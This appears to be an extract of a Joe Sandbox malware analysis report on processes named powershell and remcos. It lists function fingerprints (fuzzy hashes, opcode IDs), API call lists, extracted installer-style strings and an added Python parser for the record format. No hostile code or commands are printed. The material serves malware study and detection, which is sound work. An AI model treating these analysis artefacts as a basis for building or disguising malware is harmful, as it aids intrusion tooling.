Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$$^q$$^q$$^q
• API String ID: 0-3272787073
• Opcode ID: d428945403abe10c72cd8657c1bd576925579cc042a8e3a09ba065e19069c30f
• Instruction ID: 6ffc5be575374c34ad8342ecf141eb0619b4753b4c5cb3181e9bdf18890a9b2c
• Opcode Fuzzy Hash: d428945403abe10c72cd8657c1bd576925579cc042a8e3a09ba065e19069c30f
• Instruction Fuzzy Hash: D5413BB5B0120ADFCB294E69844C366FBE1BF85320F28986BD8558F2D4DF35E845C791

Strings
Memory Dump Source
• Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                • API String ID: 0-3272787073
                                                                                                                                • Opcode ID: 9733fe77942e15aa06d04f85778c59cdcd0503f0430983291da0b35c4c31fd92
                                                                                                                                • Instruction ID: 657f05c6ffcf34a4aa3c08997e4556b75fc63425a54551f0057590e655c610e9
                                                                                                                                • Opcode Fuzzy Hash: 9733fe77942e15aa06d04f85778c59cdcd0503f0430983291da0b35c4c31fd92
                                                                                                                                • Instruction Fuzzy Hash: 19316EB6B04286CFCB294E29A414F76F7A1AFC3211B24A87EC6518B2D5DF32C455C7D1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                                                                                                                • API String ID: 0-3846404929
                                                                                                                                • Opcode ID: e21ee32a015de6df12343564b07885eb7a12d81202fa4dbfaa152ab1f7285e98
                                                                                                                                • Instruction ID: 07487a0ead088cef5a0f7f825eccc117deec71270ce629771a2530b6179a4546
                                                                                                                                • Opcode Fuzzy Hash: e21ee32a015de6df12343564b07885eb7a12d81202fa4dbfaa152ab1f7285e98
                                                                                                                                • Instruction Fuzzy Hash: 2A318FB1B102159FCB28DF65C444BAEFBA2FB48714F249659E909AB390C631DC41CBE4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (o^q$(o^q$(o^q$(o^q
                                                                                                                                • API String ID: 0-1978863864
                                                                                                                                • Opcode ID: e906f0b39d3493e2d4f6c66582fb8920d6df9e1a49e3c90a976a66b0f25eb5ad
                                                                                                                                • Instruction ID: 01fcf1247058e1397de1c3afe62dca8e6cc9fdf2aeb5530cc9ebbb05c213db6f
                                                                                                                                • Opcode Fuzzy Hash: e906f0b39d3493e2d4f6c66582fb8920d6df9e1a49e3c90a976a66b0f25eb5ad
                                                                                                                                • Instruction Fuzzy Hash: C9F114B17142069FCB248F68D8047EABBA2FF82310F14966AE5098B6D1DB36D855C7F1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                • API String ID: 0-1420252700
                                                                                                                                • Opcode ID: 5e5595fc0f1b0b9f7260693017275084cc5a08a2b647b0fa1b84cdc9d2d96eaa
                                                                                                                                • Instruction ID: 3098559d88a676d4e4616d4964816f5ddbe1d711a51c6ac6deeb655766449078
                                                                                                                                • Opcode Fuzzy Hash: 5e5595fc0f1b0b9f7260693017275084cc5a08a2b647b0fa1b84cdc9d2d96eaa
                                                                                                                                • Instruction Fuzzy Hash: 50E1B3B0B002059FDB24EB64C951B6EFBB3AF85708F149869D5016FB94DB31EC468BE1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$]$$^q
                                                                                                                                • API String ID: 0-2262204542
                                                                                                                                • Opcode ID: e68dc959c8e218ad32f8d40300ec8c4d93b995342ce8ec54d41dba628cbb5443
                                                                                                                                • Instruction ID: 456ba86f9d37b5180764b11a590726516ceccc9cc602d313e76f5fbb2a093f6c
                                                                                                                                • Opcode Fuzzy Hash: e68dc959c8e218ad32f8d40300ec8c4d93b995342ce8ec54d41dba628cbb5443
                                                                                                                                • Instruction Fuzzy Hash: DB516AB1B043059FCB249A699921767FFB59FC6314F14A07AD485CB2D3DA31E891C3E1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ]$$^q$$^q$$^q
                                                                                                                                • API String ID: 0-2184375889
                                                                                                                                • Opcode ID: 603cb80e18bcda1e1cc8655715e2cd555a50a7b4e49855905a0ee61075fa7a4d
                                                                                                                                • Instruction ID: 72c2e78832e75a6aa4764d99f896dd8ff31185e3784a03e8129b870191cddae0
                                                                                                                                • Opcode Fuzzy Hash: 603cb80e18bcda1e1cc8655715e2cd555a50a7b4e49855905a0ee61075fa7a4d
                                                                                                                                • Instruction Fuzzy Hash: 1E5149F5B043869FCB348A699804B6BFBE6AFC3611F24946BDA45CF281DA31C845C7D1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: XRcq$XRcq$tP^q$$^q
                                                                                                                                • API String ID: 0-3596674671
                                                                                                                                • Opcode ID: 8c778b529dea677fa7bbf24fc2b081a1c36ada7f4693c5ff3f23e0fd42637017
                                                                                                                                • Instruction ID: bc74367eb08b54c6bf4388e9914cf6e4e918347a4a9146b6965de00c2814f02a
                                                                                                                                • Opcode Fuzzy Hash: 8c778b529dea677fa7bbf24fc2b081a1c36ada7f4693c5ff3f23e0fd42637017
                                                                                                                                • Instruction Fuzzy Hash: E14170B1B04205DBCB24CE99C144BAAFBF3AB89710F69E19AE8046B3D5C771D941CBD0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                                • API String ID: 0-2125118731
                                                                                                                                • Opcode ID: e5aed210308531d8d2cd73ebf5b2b39076862ee6b63760f85c388a15e023ddac
                                                                                                                                • Instruction ID: 0d09d9ae2dc7a6fba0984d70c018f740ebab70513392bcfa23c365656157567c
                                                                                                                                • Opcode Fuzzy Hash: e5aed210308531d8d2cd73ebf5b2b39076862ee6b63760f85c388a15e023ddac
                                                                                                                                • Instruction Fuzzy Hash: 9C2177B270030EBBDB28457A9C04B27E7D69BC0715F24982AA445EB3C5DE36C88183A0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                • API String ID: 0-2049395529
                                                                                                                                • Opcode ID: e7ddbc2001f009c8fd670c26cf12f62072fb26eb47f780b177a2e48132df496a
                                                                                                                                • Instruction ID: 085bf2a8566b27ed48e2ed1c4f0e0c7747e006e73f2e69783b3b02090e27f16f
                                                                                                                                • Opcode Fuzzy Hash: e7ddbc2001f009c8fd670c26cf12f62072fb26eb47f780b177a2e48132df496a
                                                                                                                                • Instruction Fuzzy Hash: 1BF05CB0B0021BBBCA3D155D152032AD6E76BC0E19B25952FC441AF3CCCE21CC8643CB
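The function records above all share one memory-dump source and one snapshot file, and in every record the Opcode ID and the Opcode Fuzzy Hash carry the same value. Pulling the hashes and String IDs out of this listing by hand is error-prone, so here is a small parser for the record format, written for this page and not part of Joe Sandbox. Its sample input is two records copied verbatim from the listing above. Two things in it are this example's own assumptions: that a record begins at the `Strings` label, and that an empty token produced by splitting a String ID on Joe Sandbox's `$` separator means the next string itself starts with a literal `$` (the `$$^q` runs above), which is why `split_string_id` re-attaches it; `as_le_int` reads a String ID entry as a little-endian integer on the assumption that these short printable runs are pointer bytes from the dump rather than real strings.

```python
"""Parse the per-function "Strings / Memory Dump Source / Similarity" records
that Joe Sandbox's IDA plugin emits in the textual report.

Added example for this page, not Joe Sandbox code. SAMPLE is copied from two
records in the report; the '$' re-attachment rule and the little-endian
reading of String ID entries are assumptions made here.
"""
from collections import Counter

# Two records copied verbatim from the report listing.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q$$^q$$^q$$^q
• API String ID: 0-3272787073
• Opcode ID: d428945403abe10c72cd8657c1bd576925579cc042a8e3a09ba065e19069c30f
• Instruction ID: 6ffc5be575374c34ad8342ecf141eb0619b4753b4c5cb3181e9bdf18890a9b2c
• Opcode Fuzzy Hash: d428945403abe10c72cd8657c1bd576925579cc042a8e3a09ba065e19069c30f
• Instruction Fuzzy Hash: D5413BB5B0120ADFCB294E69844C366FBE1BF85320F28986BD8558F2D4DF35E845C791
Strings
Memory Dump Source
• Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
Similarity
• API ID:
• String ID: XRcq$XRcq$tP^q$$^q
• API String ID: 0-3596674671
• Opcode ID: 8c778b529dea677fa7bbf24fc2b081a1c36ada7f4693c5ff3f23e0fd42637017
• Instruction ID: bc74367eb08b54c6bf4388e9914cf6e4e918347a4a9146b6965de00c2814f02a
• Opcode Fuzzy Hash: 8c778b529dea677fa7bbf24fc2b081a1c36ada7f4693c5ff3f23e0fd42637017
• Instruction Fuzzy Hash: E14170B1B04205DBCB24CE99C144BAAFBF3AB89710F69E19AE8046B3D5C771D941CBD0
"""


def parse_records(text):
    """Return one dict per record. Assumption: a record starts at a line that
    reads 'Strings'; its fields are the '• Key: value' bullet lines."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Strings":
            current = {}
            records.append(current)
        elif line.startswith("•") and current is not None:
            key, _, value = line[1:].partition(":")
            current[key.strip()] = value.strip()
    return records


def source_fields(rec):
    """Split 'Source File: <dump>, Offset: <hex>, based on PE: <bool>'."""
    parts = [p.strip() for p in rec["Source File"].split(",")]
    dump = parts[0]
    offset = int(parts[1].split(":", 1)[1].strip(), 16)
    based_on_pe = parts[2].split(":", 1)[1].strip().lower() == "true"
    return dump, offset, based_on_pe


def split_string_id(field):
    """Split a String ID on the '$' separator. Assumption: an empty token means
    the following string began with a literal '$', so it is re-attached."""
    out, pending = [], ""
    for tok in field.split("$"):
        if tok == "":
            pending += "$"
        else:
            out.append(pending + tok)
            pending = ""
    return out


def as_le_int(s):
    """Read a String ID entry as a little-endian integer. Assumption: the
    4-byte printable runs (e.g. "4'^q") are pointer bytes from the dump."""
    return int.from_bytes(s.encode("latin-1"), "little")


def summarise(text):
    """Collect the fuzzy hashes, check Opcode ID == Opcode Fuzzy Hash (true
    for every record on the page, so a mismatch flags a damaged copy), and
    count the String ID entries across records."""
    recs = parse_records(text)
    consistent = all(r["Opcode ID"] == r["Opcode Fuzzy Hash"] for r in recs)
    strings = Counter(s for r in recs for s in split_string_id(r["String ID"]))
    return {
        "records": len(recs),
        "opcode_id_equals_fuzzy_hash": consistent,
        "instruction_fuzzy_hashes": [r["Instruction Fuzzy Hash"] for r in recs],
        "string_counts": dict(strings),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarise(SAMPLE), indent=2))
```

Run it against the whole listing rather than the two-record sample to get the full set of Instruction Fuzzy Hashes for similarity pivoting; `string_counts` then shows which pointer-like entries recur across functions.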

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:8.8%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:34.4%
                                                                                                                                Total number of Nodes:997
                                                                                                                                Total number of Limit Nodes:22
                                                                                                                                execution_graph 3383 1fa116 3384 1fa0c9 3383->3384 3384->3383 3385 1f915b 9 API calls 3384->3385 3385->3384 3386 1f9c10 SetUnhandledExceptionFilter 3387 1f8d10 3388 1f8bfd 16 API calls 3387->3388 3389 1f8d24 3388->3389 3390 1f3a90 3391 1f3ab6 3390->3391 3395 1f3aac 3390->3395 3392 1f3b31 WaitForSingleObject 3391->3392 3393 1f3b46 3391->3393 3391->3395 3392->3393 3392->3395 3393->3395 3396 1f5bf0 GetModuleHandleExW 3393->3396 3397 1f5c10 GetProcAddress 3396->3397 3400 1f5c48 3396->3400 3398 1f5c3f FreeLibrary 3397->3398 3399 1f5c24 3397->3399 3398->3400 3399->3398 3401 1f5c32 FreeLibrary 3399->3401 3400->3395 3401->3400 3405 1f7d89 3406 1f7d9f 3405->3406 3407 1f7da7 3405->3407 3409 1f637a 3406->3409 3410 1f6380 3409->3410 3412 1f6391 3409->3412 3411 1f6395 UnhandledExceptionFilter 3410->3411 3410->3412 3411->3407 3412->3407 3413 1f5f04 3414 1f5f19 3413->3414 3415 1f5f56 3414->3415 3416 1f5f45 memcpy 3414->3416 3416->3415 3420 1f4f00 3421 1f4f28 3420->3421 3422 1f4f91 3420->3422 3424 1f878a 2 API calls 3421->3424 3423 1f878a 2 API calls 3422->3423 3425 1f4fa9 3423->3425 3430 1f4f43 3424->3430 3435 1f4f47 3425->3435 3439 1f4ebd lstrlenW 3425->3439 3428 1f87d4 GlobalFree 3431 1f500c 3428->3431 3429 1f4fe3 3449 1f4cec 3429->3449 3433 1f87d4 GlobalFree 3430->3433 3430->3435 3434 1f95e0 4 API calls 3431->3434 3433->3422 3436 1f501c 3434->3436 3435->3428 3437 1f4fbd 3437->3435 3441 1f4b06 3437->3441 3440 1f4ece 3439->3440 3440->3429 3440->3437 3443 1f4b2b 3441->3443 3442 1f4b8f 3446 1f4bbb 3442->3446 3470 1f57c0 3442->3470 3443->3442 3466 1f56b2 3443->3466 3447 1f95e0 4 API calls 3446->3447 3448 1f4bd2 3447->3448 3448->3435 3450 1f4d2e 3449->3450 3451 1f4d48 lstrlenW lstrlenW lstrlenW lstrlenW 3450->3451 3452 1f4df3 lstrlenW lstrlenW 3450->3452 3453 1f86d5 2 API calls 3451->3453 3454 1f86d5 2 API calls 3452->3454 3455 1f4d9a 3453->3455 3454->3455 
3460 1f4e7a 3455->3460 3462 1f4d9e 3455->3462 3493 1f3e90 3455->3493 3456 1f86b2 GlobalFree 3457 1f4de2 3456->3457 3458 1f95e0 4 API calls 3457->3458 3459 1f4df1 3458->3459 3459->3435 3460->3462 3463 1f56b2 WideCharToMultiByte 3460->3463 3462->3456 3464 1f4ea4 3463->3464 3465 1f57c0 12 API calls 3464->3465 3465->3462 3467 1f56e9 3466->3467 3469 1f56cb 3466->3469 3467->3442 3468 1f579a WideCharToMultiByte 3468->3467 3469->3467 3469->3468 3471 1f57e5 LoadLibraryExW 3470->3471 3472 1f597c 3471->3472 3473 1f5806 GetProcAddress 3471->3473 3474 1f95e0 4 API calls 3472->3474 3475 1f5975 FreeLibrary 3473->3475 3477 1f581c 3473->3477 3476 1f5989 3474->3476 3475->3472 3476->3446 3478 1f585c GetSystemDefaultLangID 3477->3478 3488 1f5912 3477->3488 3479 1f588f memset FormatMessageW 3478->3479 3480 1f5873 3478->3480 3481 1f58cf 3479->3481 3482 1f591b 3479->3482 3480->3479 3480->3488 3483 1f598b 3481->3483 3484 1f58e1 WideCharToMultiByte 3481->3484 3489 1f2dd2 3482->3489 3486 1f9728 4 API calls 3483->3486 3484->3488 3487 1f5990 3486->3487 3488->3475 3490 1f2de1 3489->3490 3491 1f2df1 _vsnprintf 3490->3491 3492 1f2e11 3490->3492 3491->3492 3492->3488 3496 1f3ea6 3493->3496 3497 1f3f24 3493->3497 3494 1f3eff lstrlenW lstrlenW 3495 1f87f5 2 API calls 3494->3495 3495->3497 3496->3494 3496->3497 3497->3460 3501 1f9280 3502 1f9285 3501->3502 3510 1f9c98 GetModuleHandleW 3502->3510 3504 1f9291 __set_app_type __p__fmode __p__commode 3505 1f92c9 3504->3505 3506 1f92de 3505->3506 3507 1f92d2 __setusermatherr 3505->3507 3512 1f9ecd _controlfp 3506->3512 3507->3506 3509 1f92e3 3511 1f9ca9 3510->3511 3511->3504 3512->3509 3513 1f8980 3516 1f88b4 3513->3516 3517 1f88d2 3516->3517 3520 1f88e6 3516->3520 3518 1f88d4 Sleep 3517->3518 3518->3518 3518->3520 3519 1f891d GetProcAddress 3522 1f892b 3519->3522 3521 1f908c 14 API calls 3520->3521 3523 1f8905 3520->3523 3521->3523 3523->3519 3523->3522 3524 1fa0bf 3525 1fa0c9 3524->3525 3526 1f915b 9 API calls 3525->3526 3526->3525 3527 1f94bf 
_XcptFilter 3531 1f7db7 3532 1f7dba 3531->3532 3533 1f8f5a 2 API calls 3532->3533 3534 1f7dc6 ExitProcess 3533->3534 2822 1f9330 2839 1f9e35 2822->2839 2824 1f9335 2825 1f9346 GetStartupInfoW 2824->2825 2826 1f9363 2825->2826 2827 1f9378 2826->2827 2828 1f937f Sleep 2826->2828 2829 1f9397 _amsg_exit 2827->2829 2831 1f93a1 2827->2831 2828->2826 2829->2831 2830 1f93e3 _initterm 2832 1f93fe __IsNonwritableInCurrentImage 2830->2832 2831->2830 2831->2832 2838 1f93c4 2831->2838 2833 1f94a6 _ismbblead 2832->2833 2835 1f94ee 2832->2835 2836 1f948e exit 2832->2836 2844 1f7d41 2832->2844 2833->2832 2837 1f94f7 _cexit 2835->2837 2835->2838 2836->2832 2837->2838 2840 1f9e5e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2839->2840 2841 1f9e5a 2839->2841 2843 1f9ead 2840->2843 2841->2840 2842 1f9ec2 2841->2842 2842->2824 2843->2842 2845 1f7d4d 2844->2845 2855 1f7d1b SetProcessMitigationPolicy 2845->2855 2847 1f7d64 2856 1f8b80 2847->2856 2859 1f8adc 2847->2859 2848 1f7d7c 2867 1f63e3 2848->2867 2855->2847 2857 1f8adc 3 API calls 2856->2857 2858 1f8b8f 2857->2858 2858->2848 2860 1f8aee 2859->2860 2861 1f8af8 2860->2861 2862 1f8ae6 Sleep 2860->2862 2863 1f8b1f 2861->2863 2864 1f8b0b LoadLibraryW 2861->2864 2865 1f8b28 GetProcAddress 2861->2865 2862->2860 2863->2865 2866 1f8b3d 2863->2866 2864->2863 2864->2865 2865->2866 2866->2848 3068 1fa1f0 2867->3068 2870 1f6474 GetCommandLineW 2876 1f64b6 GetStdHandle 2870->2876 2871 1f6440 GetCurrentProcess NtQueryInformationProcess 2871->2870 2872 1f6467 2871->2872 2872->2870 2874 1f650f 2877 1f6515 memset memset 2874->2877 2875 1f6503 GetFileType 2875->2874 2875->2877 2876->2874 2876->2875 2878 1f6558 2877->2878 2879 1f66be 2878->2879 2882 1f65a0 2878->2882 2880 1f66d6 2879->2880 2917 1f66ed 2879->2917 2881 1f8665 2 API calls 2880->2881 2897 1f66e9 2881->2897 2883 1f6f7f 2882->2883 3117 1f2f5e 2882->3117 2885 1f43a0 26 API calls 2883->2885 2885->2917 2888 1f65f4 2891 1f65ff 
[Control-flow graph data from the report's interactive graph viewer: basic-block addresses, edges between them, and the API calls made in each block; not reproduced here.]
APIs
• GetVersionExW.KERNEL32(?), ref: 001F6434
• GetCurrentProcess.KERNEL32(0000001A,?,00000004,00000000), ref: 001F6456
• NtQueryInformationProcess.NTDLL ref: 001F645D
• GetCommandLineW.KERNEL32 ref: 001F649F
• GetStdHandle.KERNEL32(000000F5), ref: 001F64F3
• GetFileType.KERNEL32(00000000), ref: 001F6504
• memset.MSVCRT ref: 001F652B
• memset.MSVCRT ref: 001F653D
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 001F661D
• RegCloseKey.ADVAPI32(?,?), ref: 001F6649
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 001F6672
• RegCloseKey.ADVAPI32(?), ref: 001F667E
• CompareStringW.KERNEL32(00000409,?,00000002,?,001F1994,000000FF), ref: 001F68CA
• CompareStringW.KERNEL32(00000409,00000001,00000002,?,package,?), ref: 001F68F9
• CompareStringW.KERNEL32(00000409,00000001,00000002,?,001F17F0,000000FF), ref: 001F69BB
• memset.MSVCRT ref: 001F6B2C
• GlobalFree.KERNEL32(?), ref: 001F6BA4
• lstrlenW.KERNEL32(?,00000063,?), ref: 001F6C69
• GlobalFree.KERNEL32(00000000), ref: 001F6F6C
• CoInitialize.OLE32(00000000), ref: 001F70D8
• CoRegisterClassObject.OLE32(001F25E0,001FB064,00000004,00000001,001FC6AC), ref: 001F710F
• GetCurrentThread.KERNEL32 ref: 001F7225
• OpenThreadToken.ADVAPI32(00000000), ref: 001F722C
• GetLastError.KERNEL32 ref: 001F723F
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001F7CAE
• TranslateMessage.USER32(?), ref: 001F7CD0
• DispatchMessageW.USER32(?), ref: 001F7CDE
Strings
• ServerMain (CA): Connection to Service failed., xrefs: 001F769B
• ServerMain (CA): Open synchronization event failed, xrefs: 001F7C8E
• ServerMain (CA): Error: icacContext in CA server should be EEUI but is not any impersonated type, xrefs: 001F742F
• norestart, xrefs: 001F67F4
• ServerMain (CA): Connect to remote object failed., xrefs: 001F77F8
• /qb!- REBOOTPROMPT=S, xrefs: 001F67E1
• ServerMain (CA): Create Custom Action Server failed., xrefs: 001F76CD
• ServerMain (CA): Error: icacContext in CA server should be AISImpersonated but is not any impersonated type, xrefs: 001F7460
• OLEAUT32.dll, xrefs: 001F70DE
• OpenProcessToken failed with %d, xrefs: 001F73F1
• REBOOTPROMPT="", xrefs: 001F683B
• uninstall, xrefs: 001F6715
• ServerMain (CA): Parsing command line failed, xrefs: 001F71E1
• ServerMain (CA): Access to token failed, xrefs: 001F7250
• package, xrefs: 001F6767, 001F6795, 001F68E8
• /l*, xrefs: 001F6859
• ServerMain (CA): Error: Watch for the shutdown signal, xrefs: 001F7621
• /qn, xrefs: 001F67C3
• quiet, xrefs: 001F67B8
• ServerMain (CA): Error: Access to SD, xrefs: 001F74C5
• ServerMain (CA): Impersonation token not saved., xrefs: 001F78DD
• q, xrefs: 001F6AFA
• passive, xrefs: 001F67D6
                                                                                                                                • help, xrefs: 001F679A
                                                                                                                                • REBOOT=Force, xrefs: 001F681D
                                                                                                                                • log, xrefs: 001F684E
                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries, xrefs: 001F65D9
                                                                                                                                • RUVEH?IJDqXFAtPYZlgmnc, xrefs: 001F6BDC, 001F6DB3, 001F6FDC
                                                                                                                                • MSIPATCHREMOVE=, xrefs: 001F6774
                                                                                                                                • ServerMain (CA): Error: Format SD, xrefs: 001F75AC
                                                                                                                                • forcerestart, xrefs: 001F6812
                                                                                                                                • promptrestart, xrefs: 001F6830
                                                                                                                                • REBOOT=ReallySuppress, xrefs: 001F67FF
                                                                                                                                • PATCH=, xrefs: 001F6710
                                                                                                                                • update, xrefs: 001F6705
                                                                                                                                • ServerMain (CA): Process not registered with service., xrefs: 001F7788
                                                                                                                                • ServerMain (CA): Wait on synchronization event failed, xrefs: 001F72E1
                                                                                                                                • ServerMain (CA): Could not open synchronization handle., xrefs: 001F77BB, 001F7ABF
                                                                                                                                • ServerMain (CA): Wrong command line, xrefs: 001F71D0
                                                                                                                                • ServerMain (CA): CoInitializeSecurity failed, xrefs: 001F75F7
                                                                                                                                • ServerMain (CA): Error: Watch for change-of-owning-process signal, xrefs: 001F764A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2194381605.00000000001F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                • Associated: 00000009.00000002.2194360866.00000000001F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000009.00000002.2194413421.00000000001FF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_1f0000_remcos.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CompareMessageQueryStringmemset$CloseCurrentFreeGlobalProcessThreadValue$ClassCommandDispatchErrorFileHandleInformationInitializeLastLineObjectOpenRegisterTokenTranslateTypeVersionlstrlen
                                                                                                                                • String ID: /l*$/qb!- REBOOTPROMPT=S$/qn$MSIPATCHREMOVE=$OLEAUT32.dll$OpenProcessToken failed with %d$PATCH=$REBOOT=Force$REBOOT=ReallySuppress$REBOOTPROMPT=""$RUVEH?IJDqXFAtPYZlgmnc$ServerMain (CA): Access to token failed$ServerMain (CA): CoInitializeSecurity failed$ServerMain (CA): Connect to remote object failed.$ServerMain (CA): Connection to Service failed.$ServerMain (CA): Could not open synchronization handle.$ServerMain (CA): Create Custom Action Server failed.$ServerMain (CA): Error: Access to SD$ServerMain (CA): Error: Format SD$ServerMain (CA): Error: Watch for change-of-owning-process signal$ServerMain (CA): Error: Watch for the shutdown signal$ServerMain (CA): Error: icacContext in CA server should be AISImpersonated but is not any impersonated type$ServerMain (CA): Error: icacContext in CA server should be EEUI but is not any impersonated type$ServerMain (CA): Impersonation token not saved.$ServerMain (CA): Open synchronization event failed$ServerMain (CA): Parsing command line failed$ServerMain (CA): Process not registered with service.$ServerMain (CA): Wait on synchronization event failed$ServerMain (CA): Wrong command line$Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries$forcerestart$help$log$norestart$package$passive$promptrestart$q$quiet$uninstall$update
                                                                                                                                • API String ID: 1475639937-2370891382
                                                                                                                                • Opcode ID: 83b2b6caea27f2f061287540e7c410472be1c0917a75a655cd41ccd1bd55b8ea
                                                                                                                                • Instruction ID: 5daa9f4c8cb342cb3af10ffb15510f9533269a224adada198fd23f6d8965255f
                                                                                                                                • Opcode Fuzzy Hash: 83b2b6caea27f2f061287540e7c410472be1c0917a75a655cd41ccd1bd55b8ea
                                                                                                                                • Instruction Fuzzy Hash: 84E2AC7150834ADFD720DF24D944BBEB7E5FB88314F14492EF689972A0EB709886CB52

Control-flow Graph

control_flow_graph 673 1f8adc-1f8ae4 674 1f8aee-1f8af6 673->674 675 1f8af8-1f8b05 674->675 676 1f8ae6-1f8ae8 Sleep 674->676 677 1f8b07-1f8b09 675->677 678 1f8b24-1f8b26 675->678 676->674 679 1f8b0b-1f8b1d LoadLibraryW 677->679 680 1f8b28-1f8b3b GetProcAddress 677->680 678->680 681 1f8b3d-1f8b42 678->681 679->680 683 1f8b1f 679->683 680->681 682 1f8b47-1f8b4e 680->682 681->682 683->678
APIs
• Sleep.KERNEL32(0000000A,?,001F8B8F,?,?), ref: 001F8AE8
• LoadLibraryW.KERNELBASE(COMCTL32,001F8B8F,?,?), ref: 001F8B10
• GetProcAddress.KERNEL32(?,InitCommonControlsEx), ref: 001F8B2E
Strings
Similarity
• API ID: AddressLibraryLoadProcSleep
• String ID: COMCTL32$InitCommonControlsEx
• API String ID: 188063004-472741233
• Opcode ID: ce6bfa679210a256ed3d808f3c58b978a48d168dc64a3ab30d5c28842cd5a094
• Instruction ID: 696ad227ffb1fc8550326a2360d8cd8e8a270c258caebae13c6c79d7d12ed525
• Opcode Fuzzy Hash: ce6bfa679210a256ed3d808f3c58b978a48d168dc64a3ab30d5c28842cd5a094
